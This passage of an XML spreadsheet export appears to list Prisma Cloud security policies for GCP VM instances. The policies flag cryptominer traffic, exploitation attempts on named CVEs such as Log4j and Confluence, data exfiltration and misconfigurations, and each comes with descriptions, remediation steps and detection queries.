          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2769" t="inlineStr"/>
      <c r="R2769" t="inlineStr"/>
      <c r="S2769" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2769" t="b">
        <v>0</v>
      </c>
      <c r="U2769" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2769" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2769" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and connected to remote systems known for cryptominer activities, and have critical or high vulnerabilities.
Cryptominers surreptitiously use a machine's resources to mine cryptocurrencies. Attackers can exploit vulnerabilities on the affected virtual machines to compromise their confidentiality, integrity, and availability, allowing them to perform malicious actions. If network connectivity with remote systems known for cryptominer activity is observed on a publicly exposed and exploitable virtual machine, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to investigate cryptominer activity, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X276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69" t="inlineStr"/>
      <c r="Z2769" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name = (('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') and ('Traffic from a suspicious IP address associated with Cryptominer activity' or 'Traffic to a suspicious IP address associated with Cryptominer activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2769" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2769" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC2769" t="inlineStr"/>
      <c r="AD2769" t="b">
        <v>1</v>
      </c>
      <c r="AE2769" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2769" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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69" t="inlineStr">
        <is>
          <t>460b5930-a09d-46a7-a520-0c06976ab469</t>
        </is>
      </c>
      <c r="AI2769" t="inlineStr">
        <is>
          <t>fc239b3c-dec4-48e3-bc86-74eb78bac327</t>
        </is>
      </c>
      <c r="AJ2769" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2769" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2770">
      <c r="A2770" t="inlineStr"/>
      <c r="B2770" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2770" s="2" t="inlineStr"/>
      <c r="D2770" t="inlineStr"/>
      <c r="E2770" t="inlineStr"/>
      <c r="F2770" t="inlineStr"/>
      <c r="G2770" t="b">
        <v>1</v>
      </c>
      <c r="H27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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2770" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2770" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [Double Free in http.sys, CVE-2022-21907]</t>
        </is>
      </c>
      <c r="L2770" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2770" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2770" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2770" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2770" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2770" t="inlineStr"/>
      <c r="R2770" t="inlineStr"/>
      <c r="S2770" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2770" t="b">
        <v>0</v>
      </c>
      <c r="U2770" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2770" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2770" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to remote code execution (RCE) with exploits in the wild [Double Free in http.sys, CVE-2022-21907]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of http.sys installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the http.sys [CVE-2022-21907] vulnerability reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X2770"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CVE-2022-21907
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-21907</t>
        </is>
      </c>
      <c r="Y2770" t="inlineStr"/>
      <c r="Z2770" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-21907 - Double Free in http.sys Remote Code Execution) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-21907'))</t>
        </is>
      </c>
      <c r="AA2770" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2770" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:36</t>
        </is>
      </c>
      <c r="AC2770" t="inlineStr"/>
      <c r="AD2770" t="b">
        <v>1</v>
      </c>
      <c r="AE2770" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2770" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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0" t="inlineStr">
        <is>
          <t>eda6f19e-66ff-4b26-9f17-77b07bb3a9e8</t>
        </is>
      </c>
      <c r="AI2770" t="inlineStr">
        <is>
          <t>fda27913-2eac-4642-a2ba-0c4ec410390d</t>
        </is>
      </c>
      <c r="AJ2770" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2770" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2771">
      <c r="A2771" t="inlineStr"/>
      <c r="B2771" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2771" s="2" t="inlineStr"/>
      <c r="D2771" t="inlineStr"/>
      <c r="E2771" t="inlineStr"/>
      <c r="F2771" t="inlineStr"/>
      <c r="G2771" t="b">
        <v>1</v>
      </c>
      <c r="H27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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2771" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2771" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [Log4j, CVE-2021-45046]</t>
        </is>
      </c>
      <c r="L2771" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2771" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2771" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2771" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2771" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2771" t="inlineStr"/>
      <c r="R2771" t="inlineStr"/>
      <c r="S2771" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2771" t="b">
        <v>0</v>
      </c>
      <c r="U2771" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2771" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2771" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to remote code execution (RCE) with exploits in the wild [Log4j, CVE-2021-45046]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of Log4j software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Log4j [CVE-2021-45046] vulnerability reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X277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CVE-2021-45046
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-45046</t>
        </is>
      </c>
      <c r="Y2771" t="inlineStr"/>
      <c r="Z2771" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-45046 - Apache Log4j2 &lt; 2.16.0) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-45046'))</t>
        </is>
      </c>
      <c r="AA2771" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2771" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:30</t>
        </is>
      </c>
      <c r="AC2771" t="inlineStr"/>
      <c r="AD2771" t="b">
        <v>1</v>
      </c>
      <c r="AE2771" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2771" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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1" t="inlineStr">
        <is>
          <t>df76da21-2567-4ed1-ba78-e4bae4c021bf</t>
        </is>
      </c>
      <c r="AI2771" t="inlineStr">
        <is>
          <t>3d3ac886-3191-49a6-ba7e-ec08ff7f7e9f</t>
        </is>
      </c>
      <c r="AJ2771" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2771" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2772">
      <c r="A2772" t="inlineStr"/>
      <c r="B2772" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2772" s="2" t="inlineStr"/>
      <c r="D2772" t="inlineStr"/>
      <c r="E2772" t="inlineStr"/>
      <c r="F2772" t="inlineStr"/>
      <c r="G2772" t="b">
        <v>1</v>
      </c>
      <c r="H27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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2772" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2772" t="inlineStr">
        <is>
          <t>Potential indication of data exfiltration activity on a publicly exposed and vulnerable GCP VM instance</t>
        </is>
      </c>
      <c r="L2772" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE,DATA_EXFILTRATION</t>
        </is>
      </c>
      <c r="M2772" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2772" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2772" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2772" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2772" t="inlineStr"/>
      <c r="R2772" t="inlineStr"/>
      <c r="S2772" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2772" t="b">
        <v>0</v>
      </c>
      <c r="U2772" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2772" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2772" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances which are publicly exposed with critical or high vulnerabilities and high volume data transfer activity.
The high volume data transfer could be a data exfiltration attempt. Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Attackers can exploit vulnerabilities on the VM instances to compromise the confidentiality, integrity and availability of the affected VM instance and perform malicious actions. If network connectivity with remote systems known for high volume data transfer activity is observed on a publicly exposed and exploitable VM instance, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to investigate the high volume data transfer activity, remediate the critical or high vulnerabilities and restrict the public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2772"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72" t="inlineStr"/>
      <c r="Z2772" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','Unusual high volume data transfer activity from a monitored cloud account') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2772" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2772" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2772" t="inlineStr"/>
      <c r="AD2772" t="b">
        <v>1</v>
      </c>
      <c r="AE2772" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2772" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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2" t="inlineStr">
        <is>
          <t>f03ae270-4e30-4124-b9b2-ebfdc00f9d6b</t>
        </is>
      </c>
      <c r="AI2772" t="inlineStr">
        <is>
          <t>89059ff4-8086-48a7-a470-ad39580a484e</t>
        </is>
      </c>
      <c r="AJ2772" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2772" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2773">
      <c r="A2773" t="inlineStr">
        <is>
          <t>GDPR, Insurance Regulatory And Development Authority Of India, ITSG-33, CIS v2.0.0 (GCP) Level 2, NYDFS 23 CRR-NY 500.0, ISO/IEC 27001:2022, CIS v3.0.0 (GCP) Level 2</t>
        </is>
      </c>
      <c r="B2773" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2773" s="2" t="inlineStr"/>
      <c r="D2773" t="inlineStr"/>
      <c r="E2773" t="inlineStr"/>
      <c r="F2773" t="inlineStr"/>
      <c r="G2773" t="b">
        <v>1</v>
      </c>
      <c r="H27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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2773" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2773" t="inlineStr">
        <is>
          <t>GCP VM instance Confidential VM service disabled</t>
        </is>
      </c>
      <c r="L2773" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2773" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2773" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2773" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2773" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2773" t="inlineStr">
        <is>
          <t>Virtual Machines</t>
        </is>
      </c>
      <c r="R2773" t="inlineStr">
        <is>
          <t>4.11</t>
        </is>
      </c>
      <c r="S2773" t="inlineStr"/>
      <c r="T2773" t="b">
        <v>0</v>
      </c>
      <c r="U2773" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2773" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2773" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that have Confidential VM service disabled.
GCP VM encrypts data at rest and in transit, but the data must be decrypted before processing. Confidential VM service (Confidential Computing) allows GCP VM to keep in-memory data secure by utilizing hardware-based memory encryption. This protects any sensitive data leakage in case the VM is compromised.
It is recommended to enable Confidential VM service on GCP VMs to enhance the confidentiality and integrity of in-memory data on the VMs.</t>
        </is>
      </c>
      <c r="X2773" t="inlineStr">
        <is>
          <t>Confidential VM services cannot be enabled for existing VM instances. A new VM should be created to enable confidential VM services on the instance. 
To create a new VM instance with confidential VM services enabled, please refer to the steps below:
1. Login to the GCP console
2. Under 'Compute Engine', navigate to the 'VM instances' (Left Panel)
3. Click on 'Create instance'
4. In the 'Confidential VM service' section, click Enable.
5. In the Enable Confidential Computing dialog, review the list of settings updated when you enable the service, and then click 'Enable'.
6. Review other settings for the VM instance.
7. Click 'Create'.
Note: For the list of supported VM configurations for confidential VM services, please refer to the URL given below:
https://cloud.google.com/confidential-computing/confidential-vm/docs/supported-configurations</t>
        </is>
      </c>
      <c r="Y2773" t="inlineStr"/>
      <c r="Z2773" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-instances-list' AND json.rule = status equal ignore case "RUNNING" and (machineType contains "machineTypes/n2d-" or machineType contains "machineTypes/c2d-") and (confidentialInstanceConfig.enableConfidentialCompute does not exist or confidentialInstanceConfig.enableConfidentialCompute is false)</t>
        </is>
      </c>
      <c r="AA2773" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2773" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2773" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-1142</t>
        </is>
      </c>
      <c r="AD2773" t="b">
        <v>1</v>
      </c>
      <c r="AE2773" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2773" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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3" t="inlineStr">
        <is>
          <t>24b6bcaa-2cec-4dbf-a22f-5425d77c4240</t>
        </is>
      </c>
      <c r="AI2773" t="inlineStr">
        <is>
          <t>022ffd8e-61a9-44f1-84c5-7b48dff3eba6</t>
        </is>
      </c>
      <c r="AJ2773" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2773" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2774">
      <c r="A2774" t="inlineStr"/>
      <c r="B2774" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2774" s="2" t="inlineStr"/>
      <c r="D2774" t="n">
        <v>72</v>
      </c>
      <c r="E2774" t="n">
        <v>0</v>
      </c>
      <c r="F2774" t="n">
        <v>0</v>
      </c>
      <c r="G2774" t="b">
        <v>1</v>
      </c>
      <c r="H27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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2774" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2774" t="inlineStr">
        <is>
          <t>CRLF Injection risk due to publicly exposed and vulnerable GCP VM instance [Python, CVE-2020-26137]</t>
        </is>
      </c>
      <c r="L2774" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2774" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2774" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2774" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2774" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2774" t="inlineStr"/>
      <c r="R2774" t="inlineStr"/>
      <c r="S2774" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2774" t="b">
        <v>0</v>
      </c>
      <c r="U2774" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2774" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2774" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable CRLF injection vulnerability [Python, CVE-2020-26137].
CRLF injection vulnerability is a security flaw allowing an attacker to inject a CRLF sequence. The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Python [CVE-2020-26137] vulnerability and public exposure reported for the GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2774"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CVE-2020-26137
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2020-26137</t>
        </is>
      </c>
      <c r="Y2774" t="inlineStr"/>
      <c r="Z2774" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2020-26137'))</t>
        </is>
      </c>
      <c r="AA2774" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2774" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:50</t>
        </is>
      </c>
      <c r="AC2774" t="inlineStr"/>
      <c r="AD2774" t="b">
        <v>1</v>
      </c>
      <c r="AE2774" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2774" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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4" t="inlineStr">
        <is>
          <t>917dba0e-2258-4a47-b1e4-899107005782</t>
        </is>
      </c>
      <c r="AI2774" t="inlineStr">
        <is>
          <t>c5ced887-d5c4-4115-9841-e93edf1e5cb5</t>
        </is>
      </c>
      <c r="AJ2774" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2774" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2775">
      <c r="A2775" t="inlineStr"/>
      <c r="B2775" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2775" s="2" t="inlineStr"/>
      <c r="D2775" t="inlineStr"/>
      <c r="E2775" t="inlineStr"/>
      <c r="F2775" t="inlineStr"/>
      <c r="G2775" t="b">
        <v>1</v>
      </c>
      <c r="H27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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2775" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2775" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [GLPI Project, CVE-2022-35914]</t>
        </is>
      </c>
      <c r="L2775" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2775" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2775" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2775" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2775" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2775" t="inlineStr"/>
      <c r="R2775" t="inlineStr"/>
      <c r="S2775" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2775" t="b">
        <v>0</v>
      </c>
      <c r="U2775" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2775" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2775" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to Remote Code Execution (RCE) with exploits in the wild[GLPI Project, CVE-2022-35914].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of GLPI Project software installed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the GLPI Project RCE [CVE-2022-35914] vulnerability reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X277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CVE-2022-35914
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-35914</t>
        </is>
      </c>
      <c r="Y2775" t="inlineStr"/>
      <c r="Z2775" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-35914 - GLPI Project RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-35914'))</t>
        </is>
      </c>
      <c r="AA2775" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2775" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:35</t>
        </is>
      </c>
      <c r="AC2775" t="inlineStr"/>
      <c r="AD2775" t="b">
        <v>1</v>
      </c>
      <c r="AE2775" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2775" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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5" t="inlineStr">
        <is>
          <t>27511a29-9c5e-46ea-918a-0521398ab26e</t>
        </is>
      </c>
      <c r="AI2775" t="inlineStr">
        <is>
          <t>8c7381cf-bad1-4e5e-9fae-08b3a87f66e4</t>
        </is>
      </c>
      <c r="AJ2775" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2775" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2776">
      <c r="A2776" t="inlineStr"/>
      <c r="B2776" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2776" s="2" t="inlineStr"/>
      <c r="D2776" t="inlineStr"/>
      <c r="E2776" t="inlineStr"/>
      <c r="F2776" t="inlineStr"/>
      <c r="G2776" t="b">
        <v>1</v>
      </c>
      <c r="H27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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2776" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2776" t="inlineStr">
        <is>
          <t>Authentication bypass exploitation attempt on GCP VM with known exploitable vulnerability (CVE-2023-22515, Confluence)</t>
        </is>
      </c>
      <c r="L2776" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2776" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2776" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2776" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2776" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2776" t="inlineStr"/>
      <c r="R2776" t="inlineStr"/>
      <c r="S2776" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2776" t="b">
        <v>0</v>
      </c>
      <c r="U2776" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2776" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2776" t="inlineStr">
        <is>
          <t>This policy identifies attempts to exploit a known vulnerability (CVE-2023-22515) in applications running on GCP VM resources. The presence of CVE-2023-22515 in the application indicates a critical security risk that could allow attackers to bypass authentication mechanisms, leading to unauthorized access to sensitive data.
Detecting attempts to exploit this vulnerability underscores the urgency of assessing and securing affected applications to prevent successful attacks. The exploitation of CVE-2023-22515 could lead to significant security incidents, including unauthorized access to sensitive data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CVE-2023-22515 vulnerability on affected GCP VM instances.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2776" t="inlineStr">
        <is>
          <t>[Vulnerability]
1. Identify and access the reported resource affected by CVE-2023-22515
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
https://nvd.nist.gov/vuln/detail/CVE-2023-22515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776" t="inlineStr"/>
      <c r="Z2776" t="inlineStr">
        <is>
          <t>asset WHERE asset.type = 'gcloud-compute-instances-list' and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2023-22515 - Confluence authentication bypass ) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2023-22515'))</t>
        </is>
      </c>
      <c r="AA2776" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2776" t="inlineStr">
        <is>
          <t>2024-05-23 08:56:29</t>
        </is>
      </c>
      <c r="AC2776" t="inlineStr"/>
      <c r="AD2776" t="b">
        <v>1</v>
      </c>
      <c r="AE2776" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2776" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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6" t="inlineStr">
        <is>
          <t>fcf52fe6-a373-42fe-b1c2-1f7561a7800f</t>
        </is>
      </c>
      <c r="AI2776" t="inlineStr">
        <is>
          <t>753bce07-f171-4f6f-bc81-bc6147758625</t>
        </is>
      </c>
      <c r="AJ2776" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2776" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2777">
      <c r="A2777" t="inlineStr"/>
      <c r="B2777" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2777" s="2" t="inlineStr"/>
      <c r="D2777" t="inlineStr"/>
      <c r="E2777" t="inlineStr"/>
      <c r="F2777" t="inlineStr"/>
      <c r="G2777" t="b">
        <v>1</v>
      </c>
      <c r="H27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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2777" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
